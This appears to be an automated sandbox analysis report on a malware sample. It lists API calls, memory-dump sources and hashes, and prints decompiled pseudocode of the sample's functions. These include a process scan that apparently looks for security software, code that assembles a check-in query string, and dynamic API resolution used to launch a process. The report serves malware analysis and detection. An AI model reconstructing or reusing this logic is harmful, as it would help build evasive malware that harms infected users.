IsValidCodePage.KERNEL32(00000000), ref: 6E1E54CF
IsValidLocale.KERNEL32(?,00000001), ref: 6E1E54DE
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E1E5526
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E1E5545

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 497058c5925a0f799604757b446b875f21bc39b405bd1c7408888fede78b2aef
Instruction ID: afd672961f011b89230fde11128eb892b91cf47d5bb67dfd9847230f0e146c45
Opcode Fuzzy Hash: 497058c5925a0f799604757b446b875f21bc39b405bd1c7408888fede78b2aef
Instruction Fuzzy Hash: 73517E72A00B06ABEF40DFE5CC45AEE73B9BF19701F144429F915EB540E7709984EB61

Uniqueness

Uniqueness Score: -1.00%

Function 0308513E, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0308513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x308a2d4; // 0x2b2d5a8
						_t2 = _t9 + 0x308bdd4; // 0x73617661
						_push( &_v264);
						if( *0x308a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x03085149
0x03085153
0x03085157
0x03085161
0x03085192
0x03085168
0x0308516d
0x0308517a
0x03085183
0x0308519a
0x03085185
0x0308518d
0x00000000
0x0308518d
0x0308519b
0x0308519c
0x00000000
0x0308519c
0x00000000
0x03085196
0x030851a2
0x030851a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0308514E
Process32First.KERNEL32(00000000,?), ref: 03085161
Process32Next.KERNEL32(00000000,?), ref: 0308518D
CloseHandle.KERNEL32(00000000), ref: 0308519C

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 31ef0c5202191c4a5cd64f2d2756b04bce097736c61b5385bd3d0881f3db75e5
Instruction ID: c35a69531fc7ef5eb38a4a22b82988e2b4fab36379fd4a833d1bbf4f65728ada
Opcode Fuzzy Hash: 31ef0c5202191c4a5cd64f2d2756b04bce097736c61b5385bd3d0881f3db75e5
Instruction Fuzzy Hash: 39F0BB352031256ADFA1F76A9C48DEB77ECDBC6310F440161F9D5D6000FA34D9468BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03086EFC, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E03086EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x308a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x308a018; // 0x7c284a1c
					asm("bswap eax");
					_t32 =  *0x308a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x308a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x308a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0x308a2d4; // 0x2b2d5a8
					_t2 = _t35 + 0x308b613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x308a02c,  *0x308a004, _t110);
					_t38 = E03086A09();
					_t39 =  *0x308a2d4; // 0x2b2d5a8
					_t3 = _t39 + 0x308b653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x308a2d4; // 0x2b2d5a8
						_t7 = _t92 + 0x308b65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E03085040(_t99);
					_t44 =  *0x308a2d4; // 0x2b2d5a8
					_t9 = _t44 + 0x308b302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x308a2d4; // 0x2b2d5a8
					_t11 = _t48 + 0x308b2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x308a32c; // 0x5bb95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x308a2d4; // 0x2b2d5a8
						_t13 = _t88 + 0x308b676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x308a37c; // 0x5bb9630
					_a28 = E03082885(0x308a00a, _t105 + 4);
					_t55 =  *0x308a31c; // 0x5bb95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x308a2d4; // 0x2b2d5a8
						_t16 = _t84 + 0x308b8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x308a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x308a2d4; // 0x2b2d5a8
						_t18 = _t81 + 0x308b8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x308a290, _t107, 0x800);
						if(_t98 != _t107) {
							E03082DD0(GetTickCount());
							_t62 =  *0x308a37c; // 0x5bb9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x308a37c; // 0x5bb9630
							__imp__(_t66 + 0x40);
							_t68 =  *0x308a37c; // 0x5bb9630
							_t115 = E0308624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x30892ac);
								_push(_t115);
								_t108 = E030821C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E03081032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E03081492();
									}
									HeapFree( *0x308a290, 0, _v24);
								}
								HeapFree( *0x308a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x308a290, _t107, _t98);
						}
						HeapFree( *0x308a290, _t107, _a20);
					}
					HeapFree( *0x308a290, _t107, _t117);
				}
				return _v16;
			}

0x03086efc
0x03086f10
0x03086f12
0x03086f20
0x03086f24
0x03086f2c
0x03086f34
0x03086f34
0x03086f36
0x03086f42
0x03086f51
0x03086f56
0x03086f59
0x03086f5e
0x03086f61
0x03086f66
0x03086f69
0x03086f75
0x03086f82
0x03086f84
0x03086f8a
0x03086f8f
0x03086f9a
0x03086f9c
0x03086f9f
0x03086fa5
0x03086fa7
0x03086fb0
0x03086fbb
0x03086fbd
0x03086fc0
0x03086fc0
0x03086fc2
0x03086fc9
0x03086fce
0x03086fdb
0x03086fdd
0x03086fe2
0x03086ff0
0x03086ff2
0x03086ff7
0x03086ffc
0x03086fff
0x03087004
0x0308700f
0x03087011
0x03087014
0x03087014
0x03087016
0x03087029
0x0308702d
0x03087032
0x03087036
0x03087039
0x0308703e
0x03087049
0x0308704b
0x0308704e
0x0308704e
0x03087050
0x03087057
0x0308705a
0x0308705f
0x03087069
0x0308706b
0x03087072
0x0308708a
0x0308708e
0x0308709a
0x0308709f
0x030870a8
0x030870b9
0x030870bd
0x030870c6
0x030870cc
0x030870d9
0x030870e6
0x030870ec
0x030870f4
0x030870fa
0x03087100
0x03087104
0x03087108
0x0308710e
0x03087112
0x03087119
0x03087120
0x03087124
0x0308712f
0x03087136
0x0308713a
0x03087143
0x03087143
0x03087154
0x03087154
0x03087163
0x03087169
0x03087169
0x03087173
0x03087173
0x03087184
0x03087184
0x03087192
0x03087192
0x030871a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 03086F1A
GetTickCount.KERNEL32 ref: 03086F2E
wsprintfA.USER32 ref: 03086F7D
wsprintfA.USER32 ref: 03086F9A
wsprintfA.USER32 ref: 03086FBB
wsprintfA.USER32 ref: 03086FD9
wsprintfA.USER32 ref: 03086FEE
wsprintfA.USER32 ref: 0308700F
wsprintfA.USER32 ref: 03087049
wsprintfA.USER32 ref: 03087069
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03087084
GetTickCount.KERNEL32 ref: 03087094
RtlEnterCriticalSection.NTDLL(05BB95F0), ref: 030870A8
RtlLeaveCriticalSection.NTDLL(05BB95F0), ref: 030870C6

Part of subcall function 0308624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,030870D9,00000000,05BB9630), ref: 03086278
Part of subcall function 0308624D: lstrlen.KERNEL32(00000000,?,00000000,030870D9,00000000,05BB9630), ref: 03086280
Part of subcall function 0308624D: strcpy.NTDLL ref: 03086297
Part of subcall function 0308624D: lstrcat.KERNEL32(00000000,00000000), ref: 030862A2
Part of subcall function 0308624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,030870D9,?,00000000,030870D9,00000000,05BB9630), ref: 030862BF

StrTrimA.SHLWAPI(00000000,030892AC,00000000,05BB9630), ref: 030870F4

Part of subcall function 030821C1: lstrlen.KERNEL32(05BB87FA,00000000,00000000,00000000,03087100,00000000), ref: 030821D1
Part of subcall function 030821C1: lstrlen.KERNEL32(?), ref: 030821D9
Part of subcall function 030821C1: lstrcpy.KERNEL32(00000000,05BB87FA), ref: 030821ED
Part of subcall function 030821C1: lstrcat.KERNEL32(00000000,?), ref: 030821F8

lstrcpy.KERNEL32(00000000,?), ref: 03087112
lstrcat.KERNEL32(00000000,00000000), ref: 03087120
lstrcat.KERNEL32(00000000,00000000), ref: 03087124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 03087154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03087163
HeapFree.KERNEL32(00000000,00000000,00000000,05BB9630), ref: 03087173
HeapFree.KERNEL32(00000000,?), ref: 03087184
HeapFree.KERNEL32(00000000,00000000), ref: 03087192

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: 28256d5936115ed71099d8f19247e95c794785b6edcade00ca5937eae1b9f49e
Instruction ID: 69368a28229a4c7738279ebe9e20a94d96d534550eb8fbd02e9974dfae61daee
Opcode Fuzzy Hash: 28256d5936115ed71099d8f19247e95c794785b6edcade00ca5937eae1b9f49e
Instruction Fuzzy Hash: F571AF71602204AFC761FB68DC88E977BECEB88710B190526F9C9C7608D73EE8159F64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E22CE, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E1E2312

Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E336E
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3380
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3392
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33A4
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33B6
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33C8
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33DA
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33EC
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E33FE
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3410
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3422
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3434
Part of subcall function 6E1E3351: _free.LIBCMT ref: 6E1E3446

_free.LIBCMT ref: 6E1E2307

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1E2329
_free.LIBCMT ref: 6E1E233E
_free.LIBCMT ref: 6E1E2349
_free.LIBCMT ref: 6E1E236B
_free.LIBCMT ref: 6E1E237E
_free.LIBCMT ref: 6E1E238C
_free.LIBCMT ref: 6E1E2397
_free.LIBCMT ref: 6E1E23CF
_free.LIBCMT ref: 6E1E23D6
_free.LIBCMT ref: 6E1E23F3
_free.LIBCMT ref: 6E1E240B

Strings

8'n, xrefs: 6E1E22E4

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8'n
API String ID: 161543041-188201432
Opcode ID: 7fda2ffc0feecac8803795e7d27a78909739a392a7b269425ff1ac46cadd4552
Instruction ID: ac456a00eb1d1bd8b0bbcab75d4aa3db430953b3d60d6f885f1b56532b478bc7
Opcode Fuzzy Hash: 7fda2ffc0feecac8803795e7d27a78909739a392a7b269425ff1ac46cadd4552
Instruction Fuzzy Hash: 3231A231608B06DFEB509BB4D864B8A73E9EF14314F204959F169D7950DF74E8C4EB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E0FBC, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 6E1E0ADD: CreateFileW.KERNEL32(00000000,00000000,?,6E1E1065,?,?,00000000,?,6E1E1065,00000000,0000000C), ref: 6E1E0AFA

GetLastError.KERNEL32 ref: 6E1E10D0
__dosmaperr.LIBCMT ref: 6E1E10D7
GetFileType.KERNEL32(00000000), ref: 6E1E10E3
GetLastError.KERNEL32 ref: 6E1E10ED
__dosmaperr.LIBCMT ref: 6E1E10F6
CloseHandle.KERNEL32(00000000), ref: 6E1E1116
CloseHandle.KERNEL32(6E1D5775), ref: 6E1E1263
GetLastError.KERNEL32 ref: 6E1E1295
__dosmaperr.LIBCMT ref: 6E1E129C

Strings

H, xrefs: 6E1E1221

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: f2caf5321be8ab53c34745163fdde56b766ea1903063d41d2089deeee5084daa
Instruction ID: 7a6ed468353be80959812bcf1d9b45accd0085536f8f196f0815d08e021badea
Opcode Fuzzy Hash: f2caf5321be8ab53c34745163fdde56b766ea1903063d41d2089deeee5084daa
Instruction Fuzzy Hash: 70A10272A149558FCF0ADFA8CC54BEE3BB5AF07324F240159F811EB280DB34899AD761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D76FE, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D7714

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1D7720
_free.LIBCMT ref: 6E1D772B
_free.LIBCMT ref: 6E1D7736
_free.LIBCMT ref: 6E1D7741
_free.LIBCMT ref: 6E1D774C
_free.LIBCMT ref: 6E1D7757
_free.LIBCMT ref: 6E1D7762
_free.LIBCMT ref: 6E1D776D
_free.LIBCMT ref: 6E1D777B

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4a38d7fffb0d8aed2913a8dfd1c0fca969364cb3e8224d959d19b1bb46fc3813
Instruction ID: 2f3a8a90cc5406ce275184ea0580c51870048b5d050efb37faa414355e9ac249
Opcode Fuzzy Hash: 4a38d7fffb0d8aed2913a8dfd1c0fca969364cb3e8224d959d19b1bb46fc3813
Instruction Fuzzy Hash: 8421EA7A91410CEFCB41EFD4C890DDD7BB9BF18244F004AA6E615AB521DB35DA88DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA30C, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1CA6E9

Strings

f, xrefs: 6E1CA413
:, xrefs: 6E1CA3CE
f, xrefs: 6E1CA459
p, xrefs: 6E1CA3FE
p, xrefs: 6E1CA460
p, xrefs: 6E1CA41A
f, xrefs: 6E1CA3F7

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 5bcf7cfe38444a14d44ead6bb87e02e00ee46c27845096e2dcf17161359722db
Instruction ID: 4a4bd99d8a836d9efc56dc2ff4e976957159976108996570c9e4ef5048b4542d
Opcode Fuzzy Hash: 5bcf7cfe38444a14d44ead6bb87e02e00ee46c27845096e2dcf17161359722db
Instruction Fuzzy Hash: E5028E79A002198BEB228FE5D4646DDB772FB20F14F608116D526FB684D7388DC9EB13

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6EBD, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e5d59501d911fcbb1ba525f37106e2be017d0010d26a2da85509cc92a2f033
Instruction ID: abea5237fb7761f98dd64f883717daea1e8a7caf2806e668af8b647dec34ab3e
Opcode Fuzzy Hash: 20e5d59501d911fcbb1ba525f37106e2be017d0010d26a2da85509cc92a2f033
Instruction Fuzzy Hash: 4FC1F6B0A18B4AAFEF05CFD9C890BADBBB5FF5A304F10445AF51097682D7709981DB21

Uniqueness

Uniqueness Score: -1.00%

Function 03085927, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E03085927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x308a38c; // 0x5bb9ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E03084E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x30891ac;
				}
				_t46 = E030842F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E03086837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x308a2d4; // 0x2b2d5a8
						_t16 = _t75 + 0x308baa8; // 0x530025
						 *0x308a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E03084E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x30891b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E03086837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E030850CA(_v20);
						} else {
							_t66 =  *0x308a2d4; // 0x2b2d5a8
							_t31 = _t66 + 0x308bbc8; // 0x73006d
							 *0x308a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E030850CA(_v12);
				}
				return _v24;
			}

0x0308592f
0x03085935
0x0308593c
0x03085942
0x03085946
0x0308594a
0x0308594d
0x03085954
0x03085957
0x03085959
0x03085959
0x03085962
0x03085969
0x0308596c
0x03085972
0x0308597c
0x03085985
0x0308598c
0x030859a5
0x030859ac
0x030859af
0x030859b8
0x030859c1
0x030859d2
0x030859db
0x030859df
0x030859e3
0x030859ea
0x030859ed
0x030859ef
0x030859ef
0x030859f9
0x03085a02
0x03085a09
0x03085a21
0x03085a25
0x03085a62
0x03085a27
0x03085a2a
0x03085a32
0x03085a43
0x03085a4f
0x03085a57
0x03085a5b
0x03085a5b
0x03085a25
0x03085a6a
0x03085a6f
0x03085a76

APIs

GetTickCount.KERNEL32 ref: 0308593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 0308597C
lstrlen.KERNEL32(00000000), ref: 03085985
lstrlen.KERNEL32(00000000), ref: 0308598C
lstrlenW.KERNEL32(80000002), ref: 03085999
lstrlen.KERNEL32(?,00000004), ref: 030859F9
lstrlen.KERNEL32(?), ref: 03085A02
lstrlen.KERNEL32(?), ref: 03085A09
lstrlenW.KERNEL32(?), ref: 03085A10

Part of subcall function 030850CA: RtlFreeHeap.NTDLL(00000000,00000000,03084239,00000000,00000001,?,00000000,?,?,?,03086B8D,00000000,?,00000001), ref: 030850D6

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 18b6263781dfc38e4eb2c096b271e4682dfafa9dffdb62b5be3ad6b270d26504
Instruction ID: bf42e388e575c87ea5a9d881f5e65f7e83b0ea4eefb5d86d70002b9f63801bf8
Opcode Fuzzy Hash: 18b6263781dfc38e4eb2c096b271e4682dfafa9dffdb62b5be3ad6b270d26504
Instruction Fuzzy Hash: B2410776901219EFCF11FFA4DD48ADEBBB5EF48314F050051EA84A7221D7399A25DF90

Uniqueness

Uniqueness Score: -1.00%

Function 030851A8, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E030851A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E03084F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E030877A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x308a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x308a2d4; // 0x2b2d5a8
					_t18 = _t50 + 0x308b4a3; // 0x73797325
					_t52 = E03086343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x308a2d4; // 0x2b2d5a8
						_t20 = _t53 + 0x308b770; // 0x5bb8d18
						_t21 = _t53 + 0x308b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x308a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E030850CA(_t76);
				goto L12;
			}

0x030851b1
0x030851b1
0x030851bf
0x030851c8
0x030851cb
0x030852dd
0x030852e4
0x030852e4
0x030851da
0x030851e2
0x030851e7
0x030851ea
0x030851ff
0x03085205
0x03085206
0x03085209
0x0308520f
0x03085212
0x03085217
0x0308521f
0x03085226
0x0308522d
0x03085230
0x030852c4
0x03085236
0x03085236
0x0308523b
0x03085242
0x03085256
0x0308525a
0x030852ab
0x0308525c
0x0308525c
0x03085263
0x0308526a
0x03085282
0x03085288
0x0308528c
0x030852a6
0x0308528e
0x03085297
0x0308529c
0x0308529c
0x0308528c
0x030852bc
0x030852bc
0x03085230
0x030852cb
0x030852d4
0x030852d8
0x00000000

APIs

Part of subcall function 03084F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,030851C4,?,?,?,?,00000000,00000000), ref: 03084F7F
Part of subcall function 03084F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 03084FA1
Part of subcall function 03084F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 03084FB7
Part of subcall function 03084F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03084FCD
Part of subcall function 03084F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03084FE3
Part of subcall function 03084F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03084FF9

memset.NTDLL ref: 03085212

Part of subcall function 03086343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0308522B,73797325), ref: 03086354
Part of subcall function 03086343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0308636E

GetModuleHandleA.KERNEL32(4E52454B,05BB8D18,73797325), ref: 03085249
GetProcAddress.KERNEL32(00000000), ref: 03085250
